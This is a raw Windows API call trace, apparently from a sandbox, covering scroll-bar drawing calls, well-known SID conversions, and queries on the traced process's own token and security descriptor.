[0202.121] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] IsIconic (hWnd=0x1601a8) returned 0
[0202.121] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] IsIconic (hWnd=0x1601a8) returned 0
[0202.121] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.121] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0202.121] GetSysColor (nIndex=20) returned 0xffffff
[0202.121] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0202.121] FlatSB_SetScrollInfo (param_1=0x1601a8, code=1, psi=0x10f212, fRedraw=1) returned 0
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] IsIconic (hWnd=0x1601a8) returned 0
[0202.121] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] IsIconic (hWnd=0x1601a8) returned 0
[0202.121] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f204 | out: lpRect=0x10f204) returned 1
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] IsIconic (hWnd=0x1601a8) returned 0
[0202.122] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] IsIconic (hWnd=0x1601a8) returned 0
[0202.122] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.122] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0202.122] GetSysColor (nIndex=20) returned 0xffffff
[0202.122] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0202.122] FlatSB_SetScrollInfo (param_1=0x1601a8, code=0, psi=0x10f212, fRedraw=1) returned 0
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] IsIconic (hWnd=0x1601a8) returned 0
[0202.122] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] IsIconic (hWnd=0x1601a8) returned 0
[0202.122] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.122] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.122] IsIconic (hWnd=0x1601a8) returned 0
[0202.122] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.122] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0202.122] GetSysColor (nIndex=20) returned 0xffffff
[0202.122] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0202.122] FlatSB_SetScrollInfo (param_1=0x1601a8, code=1, psi=0x10f212, fRedraw=1) returned 0
[0202.123] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.123] IsIconic (hWnd=0x1601a8) returned 0
[0202.123] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.123] GetCurrentThreadId () returned 0x8d8
[0202.123] ConvertSidToStringSidA () returned 0x1
[0202.123] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.123] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0202.123] LocalFree (hMem=0x156f40) returned 0x0
[0202.123] LocalFree (hMem=0x142f90) returned 0x0
[0202.123] ConvertStringSidToSidA () returned 0x1
[0202.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a62914, pSourceSid=0x142f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.123] IsValidSid (pSid=0x2a62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.123] ConvertSidToStringSidA () returned 0x1
[0202.123] LocalFree (hMem=0x156f40) returned 0x0
[0202.123] LocalFree (hMem=0x142f90) returned 0x0
[0202.123] ConvertStringSidToSidA () returned 0x1
[0202.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6702c, pSourceSid=0x142f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.124] IsValidSid (pSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x156f40) returned 0x0
[0202.124] LocalFree (hMem=0x142f90) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f5a0, pSourceSid=0x142f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.124] IsValidSid (pSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x156f40) returned 0x0
[0202.124] LocalFree (hMem=0x142f90) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f614, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.124] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x156f58) returned 0x0
[0202.124] LocalFree (hMem=0x156f40) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f688, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0202.124] IsValidSid (pSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x156f58) returned 0x0
[0202.124] LocalFree (hMem=0x156f40) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f6fc, pSourceSid=0x156f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0202.124] IsValidSid (pSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x14c1c8) returned 0x0
[0202.124] LocalFree (hMem=0x156f58) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f770, pSourceSid=0x156f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0202.124] IsValidSid (pSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0202.124] ConvertSidToStringSidA () returned 0x1
[0202.124] LocalFree (hMem=0x14c1c8) returned 0x0
[0202.124] LocalFree (hMem=0x156f70) returned 0x0
[0202.124] ConvertStringSidToSidA () returned 0x1
[0202.124] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f7f8, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0202.125] IsValidSid (pSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0202.125] ConvertSidToStringSidA () returned 0x1
[0202.125] LocalFree (hMem=0x14c1c8) returned 0x0
[0202.125] LocalFree (hMem=0x156f40) returned 0x0
[0202.125] ConvertStringSidToSidA () returned 0x1
[0202.125] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f880, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0202.125] IsValidSid (pSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0202.125] ConvertSidToStringSidA () returned 0x1
[0202.125] LocalFree (hMem=0x156f58) returned 0x0
[0202.125] LocalFree (hMem=0x156f40) returned 0x0
[0202.125] ConvertStringSidToSidA () returned 0x1
[0202.125] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f90c, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0202.125] IsValidSid (pSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0202.125] ConvertSidToStringSidA () returned 0x1
[0202.125] LocalFree (hMem=0x156f58) returned 0x0
[0202.125] LocalFree (hMem=0x156f40) returned 0x0
[0202.125] ConvertStringSidToSidA () returned 0x1
[0202.125] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f998, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0202.125] IsValidSid (pSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0202.125] ConvertSidToStringSidA () returned 0x1
[0202.125] LocalFree (hMem=0x156f58) returned 0x0
[0202.125] LocalFree (hMem=0x156f40) returned 0x0
[0202.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.125] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0202.125] GetCurrentThread () returned 0xfffffffe
[0202.125] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.126] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0202.126] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x10ea94 | out: TokenHandle=0x10ea94*=0x2943756) returned 0
[0202.126] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.126] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0202.126] GetCurrentProcess () returned 0xffffffff
[0202.126] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.126] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0202.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a6fa3c | out: TokenHandle=0x2a6fa3c*=0x1d0) returned 1
[0202.126] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.126] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0202.126] MapGenericMask (in: AccessMask=0x10e90c, GenericMapping=0x10e910 | out: AccessMask=0x10e90c)
[0202.126] MapGenericMask (in: AccessMask=0x10ea40, GenericMapping=0x10ea44 | out: AccessMask=0x10ea40)
[0202.126] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.127] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0202.127] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10ea54 | out: TokenInformation=0x0, ReturnLength=0x10ea54) returned 0
[0202.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.127] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0202.127] GetLastError () returned 0x7a
[0202.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.127] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0202.127] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x150780, TokenInformationLength=0x24, ReturnLength=0x10ea78 | out: TokenInformation=0x150780, ReturnLength=0x10ea78) returned 1
[0202.127] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fab0, pSourceSid=0x150788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0202.127] IsValidSid (pSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0202.127] ConvertSidToStringSidA () returned 0x1
[0202.127] LocalFree (hMem=0x149e80) returned 0x0
[0202.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.127] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0202.127] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fb34, pSourceSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0202.127] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0202.127] ConvertSidToStringSidA () returned 0x1
[0202.127] LocalFree (hMem=0x149e80) returned 0x0
[0202.128] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0202.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.128] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0202.128] CloseHandle (hObject=0x1d0) returned 1
[0202.128] ConvertStringSidToSidA () returned 0x1
[0202.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fa54, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0202.128] IsValidSid (pSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0202.128] ConvertSidToStringSidA () returned 0x1
[0202.128] LocalFree (hMem=0x156f58) returned 0x0
[0202.128] LocalFree (hMem=0x156f40) returned 0x0
[0202.128] ConvertStringSidToSidA () returned 0x1
[0202.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fae0, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0202.128] IsValidSid (pSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0202.128] ConvertSidToStringSidA () returned 0x1
[0202.128] LocalFree (hMem=0x156f58) returned 0x0
[0202.128] LocalFree (hMem=0x156f40) returned 0x0
[0202.128] ConvertStringSidToSidA () returned 0x1
[0202.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fbfc, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0202.128] IsValidSid (pSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0202.128] ConvertSidToStringSidA () returned 0x1
[0202.128] LocalFree (hMem=0x156f58) returned 0x0
[0202.128] LocalFree (hMem=0x156f40) returned 0x0
[0202.128] ConvertStringSidToSidA () returned 0x1
[0202.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fc8c, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0202.128] IsValidSid (pSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0202.128] ConvertSidToStringSidA () returned 0x1
[0202.128] LocalFree (hMem=0x156f58) returned 0x0
[0202.128] LocalFree (hMem=0x156f40) returned 0x0
[0202.128] ConvertStringSidToSidA () returned 0x1
[0202.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fd1c, pSourceSid=0x156f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0202.129] IsValidSid (pSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0202.129] ConvertSidToStringSidA () returned 0x1
[0202.129] LocalFree (hMem=0x156f58) returned 0x0
[0202.129] LocalFree (hMem=0x156f40) returned 0x0
[0202.129] GetCurrentProcessId () returned 0x980
[0202.129] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x980) returned 0x1d0
[0202.129] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.129] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0202.129] GetSecurityInfo () returned 0x0
[0202.132] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.132] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0202.132] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x150f28, pControl=0x10e81a, lpdwRevision=0x10e814 | out: pControl=0x10e81a, lpdwRevision=0x10e814) returned 1
[0202.132] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.132] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0202.132] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x150f28, pOwner=0x10e810, lpbOwnerDefaulted=0x10e804 | out: pOwner=0x10e810*=0x0, lpbOwnerDefaulted=0x10e804) returned 1
[0202.132] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.132] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0202.132] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x150f28, pGroup=0x10e810, lpbGroupDefaulted=0x10e804 | out: pGroup=0x10e810*=0x0, lpbGroupDefaulted=0x10e804) returned 1
[0202.132] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.132] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0202.132] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x150f28, lpbDaclPresent=0x10e808, pDacl=0x10e7fc, lpbDaclDefaulted=0x10e804 | out: lpbDaclPresent=0x10e808, pDacl=0x10e7fc, lpbDaclDefaulted=0x10e804) returned 1
[0202.133] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.133] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0202.133] IsValidAcl (pAcl=0x150f3c) returned 1
[0202.133] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.133] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0202.133] GetAce (in: pAcl=0x150f3c, dwAceIndex=0x0, pAce=0x10e69c | out: pAce=0x10e69c*=0x150f44) returned 1
